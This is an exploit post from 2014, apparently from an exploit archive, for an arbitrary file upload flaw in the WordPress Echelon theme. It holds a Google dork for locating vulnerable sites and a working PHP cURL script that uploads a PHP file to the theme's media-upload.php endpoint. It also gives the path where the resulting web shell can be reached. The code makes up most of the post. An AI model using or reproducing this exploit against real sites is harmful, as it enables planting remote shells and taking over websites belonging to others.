The WordPress Echelon theme suffers from a remote shell upload vulnerability.
c33b258feee36d875dc4c0082563970e58db338744d94505982121e9877a3449
# Exploit Author:Th3 R0cksT3r
# Exploit Title: WordPress Echelon Theme Shell Upload
# Date: 25.04.2014
# Email: th3rockst3r@gmail.com
# Vendor Homepage: http://wordpress.org/
# Google Dork: inurl:/wp-content/themes/echelon/
#Exploit :
==========
<?php
$uploadfile="file.php";
$ch = curl_init("
http://127.0.0.1/wp-content/themes/echelon/lib/admin/functions/media-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>
=========
Shell Access: http://localhost/wp-content/uploads/[years]/[month]/file.php
Greets: Bangladesh Black HAT Hackers